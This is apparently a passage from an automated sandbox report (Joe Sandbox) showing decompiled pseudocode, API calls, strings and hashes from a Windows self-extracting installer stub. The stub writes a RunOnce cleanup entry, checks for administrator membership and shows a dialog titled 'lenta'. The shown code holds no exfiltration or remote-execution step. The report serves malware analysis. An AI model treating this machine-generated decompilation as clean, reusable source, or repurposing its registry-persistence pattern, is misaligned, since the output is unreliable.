                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				CHAR* _t61;
                                                                                                                                                                                                                                              				char* _t62;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t52 = __ecx;
                                                                                                                                                                                                                                              				_t23 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                              				_t62 = _a4;
                                                                                                                                                                                                                                              				_t50 = 0;
                                                                                                                                                                                                                                              				_t61 = __ecx;
                                                                                                                                                                                                                                              				_v276 = _t62;
                                                                                                                                                                                                                                              				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                              				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t64 = _t62 + 1;
                                                                                                                                                                                                                                              					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                              					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					_t34 = _v269;
                                                                                                                                                                                                                                              					if(_t34 == 0x53) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 == 0x57) {
                                                                                                                                                                                                                                              							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(_t52);
                                                                                                                                                                                                                                              							_v288 = 0x104;
                                                                                                                                                                                                                                              							E00A81781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                              							_t59 = 0x104;
                                                                                                                                                                                                                                              							E00A8658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                              							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                              								L16:
                                                                                                                                                                                                                                              								_t59 = _t63;
                                                                                                                                                                                                                                              								E00A8658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								if(RegQueryValueExA(_v284, 0xa81140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                              									_t45 = _v280;
                                                                                                                                                                                                                                              									if(_t45 != 2) {
                                                                                                                                                                                                                                              										L9:
                                                                                                                                                                                                                                              										if(_t45 == 1) {
                                                                                                                                                                                                                                              											goto L10;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              											_t45 = _v280;
                                                                                                                                                                                                                                              											goto L9;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t59 = 0x104;
                                                                                                                                                                                                                                              											E00A81680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                              											L10:
                                                                                                                                                                                                                                              											_t50 = 1;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								RegCloseKey(_v284);
                                                                                                                                                                                                                                              								L15:
                                                                                                                                                                                                                                              								if(_t50 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                              			}























                                                                                                                                                                                                                                              0x00a82773
                                                                                                                                                                                                                                              0x00a8277e
                                                                                                                                                                                                                                              0x00a82785
                                                                                                                                                                                                                                              0x00a8278a
                                                                                                                                                                                                                                              0x00a8278d
                                                                                                                                                                                                                                              0x00a82790
                                                                                                                                                                                                                                              0x00a82792
                                                                                                                                                                                                                                              0x00a82798
                                                                                                                                                                                                                                              0x00a8279d
                                                                                                                                                                                                                                              0x00a828b2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a827a3
                                                                                                                                                                                                                                              0x00a827a3
                                                                                                                                                                                                                                              0x00a827af
                                                                                                                                                                                                                                              0x00a827c2
                                                                                                                                                                                                                                              0x00a827c8
                                                                                                                                                                                                                                              0x00a827cd
                                                                                                                                                                                                                                              0x00a827d5
                                                                                                                                                                                                                                              0x00a828b7
                                                                                                                                                                                                                                              0x00a828b9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a827db
                                                                                                                                                                                                                                              0x00a827dd
                                                                                                                                                                                                                                              0x00a828aa
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a827e3
                                                                                                                                                                                                                                              0x00a827e3
                                                                                                                                                                                                                                              0x00a827ec
                                                                                                                                                                                                                                              0x00a827f8
                                                                                                                                                                                                                                              0x00a82803
                                                                                                                                                                                                                                              0x00a8280b
                                                                                                                                                                                                                                              0x00a82831
                                                                                                                                                                                                                                              0x00a828c3
                                                                                                                                                                                                                                              0x00a828c9
                                                                                                                                                                                                                                              0x00a828cd
                                                                                                                                                                                                                                              0x00a82837
                                                                                                                                                                                                                                              0x00a8285a
                                                                                                                                                                                                                                              0x00a8285c
                                                                                                                                                                                                                                              0x00a82865
                                                                                                                                                                                                                                              0x00a82892
                                                                                                                                                                                                                                              0x00a82895
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82867
                                                                                                                                                                                                                                              0x00a82878
                                                                                                                                                                                                                                              0x00a8288c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8287a
                                                                                                                                                                                                                                              0x00a82880
                                                                                                                                                                                                                                              0x00a82885
                                                                                                                                                                                                                                              0x00a82897
                                                                                                                                                                                                                                              0x00a82899
                                                                                                                                                                                                                                              0x00a82899
                                                                                                                                                                                                                                              0x00a82878
                                                                                                                                                                                                                                              0x00a82865
                                                                                                                                                                                                                                              0x00a828a0
                                                                                                                                                                                                                                              0x00a828bf
                                                                                                                                                                                                                                              0x00a828c1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a828c1
                                                                                                                                                                                                                                              0x00a82831
                                                                                                                                                                                                                                              0x00a827dd
                                                                                                                                                                                                                                              0x00a827d5
                                                                                                                                                                                                                                              0x00a828e5

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharUpperA.USER32(D891196D,00000000,00000000,00000000), ref: 00A827A8
                                                                                                                                                                                                                                              • CharNextA.USER32(0000054D), ref: 00A827B5
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00A827BC
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82829
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00A81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82852
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82870
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A828A0
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A828AA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00A828B9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A827E4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                              • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                              • Opcode ID: 390a803a28ab9af2018a4b3d4524ec03ac7d1407788fb97188024650bdf55ef7
                                                                                                                                                                                                                                              • Instruction ID: 5aa01728c5d9f103e49b7f74e28f5ea7a230bc02fd8377d3f2e82dd5fc69be3b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 390a803a28ab9af2018a4b3d4524ec03ac7d1407788fb97188024650bdf55ef7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F417371A00128AFEB24AB649C85BFA7BBDEB55700F0440AAF545D2110DB748E969FA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                                                                                                              			E00A82267() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v836;
                                                                                                                                                                                                                                              				void* _v840;
                                                                                                                                                                                                                                              				int _v844;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t19 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				if( *0xa88530 != 0) {
                                                                                                                                                                                                                                              					_push(_t49);
                                                                                                                                                                                                                                              					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                              						_push(_t38);
                                                                                                                                                                                                                                              						_v844 = 0x238;
                                                                                                                                                                                                                                              						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                              							_push(_t47);
                                                                                                                                                                                                                                              							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              								E00A8658A( &_v268, 0x104, 0xa81140);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                              							E00A8171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                              							_t42 =  &_v836;
                                                                                                                                                                                                                                              							_t45 = _t42 + 1;
                                                                                                                                                                                                                                              							_pop(_t47);
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t33 =  *_t42;
                                                                                                                                                                                                                                              								_t42 = _t42 + 1;
                                                                                                                                                                                                                                              							} while (_t33 != 0);
                                                                                                                                                                                                                                              							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                              						_pop(_t38);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_pop(_t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x00a82272
                                                                                                                                                                                                                                              0x00a82277
                                                                                                                                                                                                                                              0x00a82279
                                                                                                                                                                                                                                              0x00a82283
                                                                                                                                                                                                                                              0x00a82289
                                                                                                                                                                                                                                              0x00a822ab
                                                                                                                                                                                                                                              0x00a822b1
                                                                                                                                                                                                                                              0x00a822c4
                                                                                                                                                                                                                                              0x00a822e0
                                                                                                                                                                                                                                              0x00a822e6
                                                                                                                                                                                                                                              0x00a822f5
                                                                                                                                                                                                                                              0x00a8230d
                                                                                                                                                                                                                                              0x00a8231c
                                                                                                                                                                                                                                              0x00a8231c
                                                                                                                                                                                                                                              0x00a82321
                                                                                                                                                                                                                                              0x00a8233a
                                                                                                                                                                                                                                              0x00a82342
                                                                                                                                                                                                                                              0x00a82348
                                                                                                                                                                                                                                              0x00a8234b
                                                                                                                                                                                                                                              0x00a8234c
                                                                                                                                                                                                                                              0x00a8234c
                                                                                                                                                                                                                                              0x00a8234e
                                                                                                                                                                                                                                              0x00a8234f
                                                                                                                                                                                                                                              0x00a8236e
                                                                                                                                                                                                                                              0x00a8236e
                                                                                                                                                                                                                                              0x00a8237a
                                                                                                                                                                                                                                              0x00a82380
                                                                                                                                                                                                                                              0x00a82380
                                                                                                                                                                                                                                              0x00a82381
                                                                                                                                                                                                                                              0x00a82381
                                                                                                                                                                                                                                              0x00a8238f

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A822A3
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00A822D8
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A822F5
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00A82305
                                                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A8236E
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A8237A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • wextract_cleanup2, xrefs: 00A8227C, 00A822CD, 00A82363
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A82299
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A82321
                                                                                                                                                                                                                                              • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A8232D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                                                              • API String ID: 3027380567-1720115735
                                                                                                                                                                                                                                              • Opcode ID: 1997ad9dbfb153b7bff54dd2f7e48f5ce353eab84988ac7059d4cbefb4e5a672
                                                                                                                                                                                                                                              • Instruction ID: edf7b5df5d75ec6e4dca50ea9a71f4ac627ceb0b83fb18089fb2c556748cf6df
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1997ad9dbfb153b7bff54dd2f7e48f5ce353eab84988ac7059d4cbefb4e5a672
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4731C571A002187BDB21EB90DC49FEB7B7CFB15700F4401AAB54DAA050EA75AB89CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                              			E00A83100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              				struct HWND__* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					if( *0xa88590 == 0) {
                                                                                                                                                                                                                                              						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                              						 *0xa88590 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t8 - 1;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L8:
                                                                                                                                                                                                                                              					EndDialog(_a4, ??);
                                                                                                                                                                                                                                              					L9:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                              				if(_t15 == 0) {
                                                                                                                                                                                                                                              					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t33 = _a4;
                                                                                                                                                                                                                                              					E00A843D0(_t33, _t16);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t33, 0x834,  *0xa88d4c);
                                                                                                                                                                                                                                              					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                              					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                              					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                              					 *0xa888b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                              					SetWindowLongA(_t34, 0xfffffffc, E00A830C0);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t15 != 1) {
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_a12 != 6) {
                                                                                                                                                                                                                                              					if(_a12 != 7) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				goto L8;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              0x00a83108
                                                                                                                                                                                                                                              0x00a8310b
                                                                                                                                                                                                                                              0x00a831b7
                                                                                                                                                                                                                                              0x00a831ca
                                                                                                                                                                                                                                              0x00a831d0
                                                                                                                                                                                                                                              0x00a831d0
                                                                                                                                                                                                                                              0x00a831da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a831da
                                                                                                                                                                                                                                              0x00a83111
                                                                                                                                                                                                                                              0x00a83114
                                                                                                                                                                                                                                              0x00a83136
                                                                                                                                                                                                                                              0x00a83136
                                                                                                                                                                                                                                              0x00a83138
                                                                                                                                                                                                                                              0x00a8313b
                                                                                                                                                                                                                                              0x00a83141
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83143
                                                                                                                                                                                                                                              0x00a83116
                                                                                                                                                                                                                                              0x00a8311b
                                                                                                                                                                                                                                              0x00a8314b
                                                                                                                                                                                                                                              0x00a83151
                                                                                                                                                                                                                                              0x00a83158
                                                                                                                                                                                                                                              0x00a8316a
                                                                                                                                                                                                                                              0x00a83176
                                                                                                                                                                                                                                              0x00a8317d
                                                                                                                                                                                                                                              0x00a8318b
                                                                                                                                                                                                                                              0x00a8319e
                                                                                                                                                                                                                                              0x00a831a3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a831ad
                                                                                                                                                                                                                                              0x00a83120
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8312a
                                                                                                                                                                                                                                              0x00a83134
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83134
                                                                                                                                                                                                                                              0x00a8312c
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00A8313B
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00A8314B
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000834), ref: 00A8316A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00A83176
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 00A8317D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000834), ref: 00A83185
                                                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000FC), ref: 00A83190
                                                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000FC,00A830C0), ref: 00A831A3
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A831CA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                              • Opcode ID: 249f27e1e1334340e4506099e3f6070a11e082b4cb18fab67110a2602852ad48
                                                                                                                                                                                                                                              • Instruction ID: f24d737f435cde1eba9a2679558f61f6d210210f5237304f9efe4e9c9fff8e6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 249f27e1e1334340e4506099e3f6070a11e082b4cb18fab67110a2602852ad48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7118132644211BBEF21EFA4AC0CB9A3E64FB5AF21F100712F915951E0EB799642C752
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                                                                              			E00A818A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				long _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* _v32;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				long _t45;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				void* _t52;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t51 = __esi;
                                                                                                                                                                                                                                              				_t49 = __edx;
                                                                                                                                                                                                                                              				_t23 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                              				_t25 =  *0xa88128; // 0x2
                                                                                                                                                                                                                                              				_t45 = 0;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t50 = 2;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if(_t25 != _t50) {
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					return E00A86CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E00A817EE( &_v20) != 0) {
                                                                                                                                                                                                                                              					_t25 = _v20;
                                                                                                                                                                                                                                              					if(_v20 != 0) {
                                                                                                                                                                                                                                              						 *0xa88128 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                              					L17:
                                                                                                                                                                                                                                              					CloseHandle(_v28);
                                                                                                                                                                                                                                              					_t25 = _v20;
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_push(__esi);
                                                                                                                                                                                                                                              					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                              					if(_t52 == 0) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						_pop(_t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                              						L15:
                                                                                                                                                                                                                                              						LocalFree(_t52);
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if( *_t52 <= 0) {
                                                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                                                              							FreeSid(_v32);
                                                                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                              						_t50 = _t15;
                                                                                                                                                                                                                                              						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                              							_t45 = _t45 + 1;
                                                                                                                                                                                                                                              							_t50 = _t50 + 8;
                                                                                                                                                                                                                                              							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0xa88128 = 1;
                                                                                                                                                                                                                                              						_v20 = 1;
                                                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00a818a3
                                                                                                                                                                                                                                              0x00a818a3
                                                                                                                                                                                                                                              0x00a818ab
                                                                                                                                                                                                                                              0x00a818b2
